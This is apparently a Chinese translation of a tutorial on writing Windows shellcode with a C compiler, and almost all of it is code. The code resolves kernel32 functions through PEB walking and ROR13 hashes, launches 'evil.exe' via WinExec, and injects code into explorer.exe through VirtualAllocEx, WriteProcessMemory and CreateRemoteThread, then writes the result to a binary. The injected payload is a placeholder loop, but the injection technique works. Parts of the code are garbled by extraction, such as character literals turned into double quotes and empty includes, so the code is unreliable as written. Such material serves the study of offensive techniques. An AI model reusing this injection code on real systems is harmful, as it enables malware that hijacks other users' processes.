第一個shellcode#includevoid shell_code() { for (;;) ; } void __declspec(naked) END_SHELLCODE(void) {} int main(int argc, char *argv[]) { int sizeofshellcode = (int)END_SHELLCODE - (int)shell_code; // Show some info about our shellcode buffer printf("Shellcode starts at %p and is %d bytes long", shell_code. sizeofshellcode); // Now we can test out the shellcode by calling it from C! shell_code(); return 0; }
call end_of_string db "evil.exe",0 end_of_string: call WinExec
char mystring[] = {"e","v","i","l",".","e","x","e",0}; winexec(mystring);
mov [ebp+mystring], 65h mov [ebp+mystring+1], 76h mov [ebp+mystring+2], 69h mov [ebp+mystring+3], 6Ch mov [ebp+mystring+4], 2Eh mov [ebp+mystring+5], 65h mov [ebp+mystring+6], 78h mov [ebp+mystring+7], 65h mov [ebp+mystring+8], 0
DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string) { DWORD hash = 0; while (*unicode_string != 0) { DWORD val = (DWORD)*unicode_string++; hash = (hash >> 13) | (hash << 19); // ROR 13 hash += val; } return hash; } DWORD __stdcall ror13_hash(const char *string) { DWORD hash = 0; while (*string) { DWORD val = (DWORD) *string++; hash = (hash >> 13)|(hash << 19); // ROR 13 hash += val; } return hash; }查找DLL
PPEB __declspec(naked) get_peb(void) { __asm { mov eax, fs:[0x30] ret } }
HMODULE __stdcall find_kernel32(void) { return find_module_by_hash(0x8FECD63F); } HMODULE __stdcall find_module_by_hash(DWORD hash) { PPEB peb; LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod; peb = get_peb(); module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink; first_mod = module_ptr; do { if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash) return (HMODULE)module_ptr->Reserved2[0]; else module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0]; } while (module_ptr && module_ptr != first_mod); // because the list wraps, return INVALID_HANDLE_VALUE; }
FARPROC __stdcall find_function(HMODULE module, DWORD hash) { IMAGE_DOS_HEADER *dos_header; IMAGE_NT_HEADERS *nt_headers; IMAGE_EXPORT_DIRECTORY *export_dir; DWORD *names, *funcs; WORD *nameords; int i; dos_header = (IMAGE_DOS_HEADER *)module; nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew); export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); names = (DWORD *)((char *)module + export_dir->AddressOfNames); funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions); nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals); for (i = 0; i < export_dir->NumberOfNames; i++) { char *string = (char *)module + names[i]; if (hash == ror13_hash(string)) { WORD nameord = nameords[i]; DWORD funcrva = funcs[nameord]; return (FARPROC)((char *)module + funcrva); } } return NULL; }
HMODULE kern32 = find_kernel32(); FARPROC loadlibrarya = find_function(kern32, 0xEC0E4E8E); // the hash of LoadLibraryA
#include#include #include #include #include PPEB get_peb(void); DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string); DWORD __stdcall ror13_hash(const char *string); HMODULE __stdcall find_module_by_hash(DWORD hash); HMODULE __stdcall find_kernel32(void); FARPROC __stdcall find_function(HMODULE module, DWORD hash); HANDLE __stdcall find_process(HMODULE kern32, const char *procname); VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size); BOOL __stdcall strmatch(const char *a, const char *b); void __stdcall shell_code() { HMODULE kern32; DWORD *dwptr; HANDLE hProcess; char procname[] = {"e","x","p","l","o","r","e","r",".","e","x","e",0}; char code[] = {0xEB, 0xFE}; kern32 = find_kernel32(); hProcess = find_process(kern32, (char *)procname); inject_code(kern32, hProcess, code, sizeof code); } HANDLE __stdcall find_process(HMODULE kern32, const char *procname) { FARPROC createtoolhelp32snapshot = find_function(kern32, 0xE454DFED); FARPROC process32first = find_function(kern32, 0x3249BAA7); FARPROC process32next = find_function(kern32, 0x4776654A); FARPROC openprocess = find_function(kern32, 0xEFE297C0); FARPROC createprocess = find_function(kern32, 0x16B3FE72); HANDLE hSnapshot; PROCESSENTRY32 pe32; hSnapshot = (HANDLE)createtoolhelp32snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) return INVALID_HANDLE_VALUE; pe32.dwSize = sizeof( PROCESSENTRY32 ); if (!process32first(hSnapshot, &pe32)) return INVALID_HANDLE_VALUE; do { if (strmatch(pe32.szExeFile, procname)) { return openprocess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); } } while (process32next(hSnapshot, &pe32)); return INVALID_HANDLE_VALUE; } BOOL __stdcall strmatch(const char *a, const char *b) { while (*a != "" && *b != "") { char aA_delta = "a" - "A"; char a_conv = *a >= "a" && *a <= "z" ? *a - aA_delta : *a; char b_conv = *b >= "a" && *b <= "z" ? *b - aA_delta : *b; if (a_conv != b_conv) return FALSE; a++; b++; } if (*b == "" && *a == "") return TRUE; else return FALSE; } VOID __stdcall inject_code(HMODULE kern32, HANDLE hprocess, const char *code, DWORD size) { FARPROC virtualallocex = find_function(kern32, 0x6E1A959C); FARPROC writeprocessmemory = find_function(kern32, 0xD83D6AA1); FARPROC createremotethread = find_function(kern32, 0x72BD9CDD); LPVOID remote_buffer; DWORD dwNumBytesWritten; remote_buffer = virtualallocex(hprocess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (remote_buffer == NULL) return; if (!writeprocessmemory(hprocess, remote_buffer, code, size, &dwNumBytesWritten)) return; createremotethread(hprocess, NULL, 0, remote_buffer, NULL, 0, NULL); } HMODULE __stdcall find_kernel32(void) { return find_module_by_hash(0x8FECD63F); } HMODULE __stdcall find_module_by_hash(DWORD hash) { PPEB peb; LDR_DATA_TABLE_ENTRY *module_ptr, *first_mod; peb = get_peb(); module_ptr = (PLDR_DATA_TABLE_ENTRY)peb->Ldr->InMemoryOrderModuleList.Flink; first_mod = module_ptr; do { if (unicode_ror13_hash((WCHAR *)module_ptr->FullDllName.Buffer) == hash) return (HMODULE)module_ptr->Reserved2[0]; else module_ptr = (PLDR_DATA_TABLE_ENTRY)module_ptr->Reserved1[0]; } while (module_ptr && module_ptr != first_mod); // because the list wraps, return INVALID_HANDLE_VALUE; } PPEB __declspec(naked) get_peb(void) { __asm { mov eax, fs:[0x30] ret } } DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string) { DWORD hash = 0; while (*unicode_string != 0) { DWORD val = (DWORD)*unicode_string++; hash = (hash >> 13) | (hash << 19); // ROR 13 hash += val; } return hash; } DWORD __stdcall ror13_hash(const char *string) { DWORD hash = 0; while (*string) { DWORD val = (DWORD) *string++; hash = (hash >> 13)|(hash << 19); // ROR 13 hash += val; } return hash; } FARPROC __stdcall find_function(HMODULE module, DWORD hash) { IMAGE_DOS_HEADER *dos_header; IMAGE_NT_HEADERS *nt_headers; IMAGE_EXPORT_DIRECTORY *export_dir; DWORD *names, *funcs; WORD *nameords; int i; dos_header = (IMAGE_DOS_HEADER *)module; nt_headers = (IMAGE_NT_HEADERS *)((char *)module + dos_header->e_lfanew); export_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); names = (DWORD *)((char *)module + export_dir->AddressOfNames); funcs = (DWORD *)((char *)module + export_dir->AddressOfFunctions); nameords = (WORD *)((char *)module + export_dir->AddressOfNameOrdinals); for (i = 0; i < export_dir->NumberOfNames; i++) { char *string = (char *)module + names[i]; if (hash == ror13_hash(string)) { WORD nameord = nameords[i]; DWORD funcrva = funcs[nameord]; return (FARPROC)((char *)module + funcrva); } } return NULL; } void __declspec(naked) END_SHELLCODE(void) {} int main(int argc, char *argv[]) { FILE *output_file = fopen("shellcode.bin", "w"); fwrite(shell_code, (int)END_SHELLCODE - (int)shell_code, 1, output_file); fclose(output_file); return 0; }
原文 Writing Shellcode with a C Compiler
翻譯 徐文博
via idf.cn
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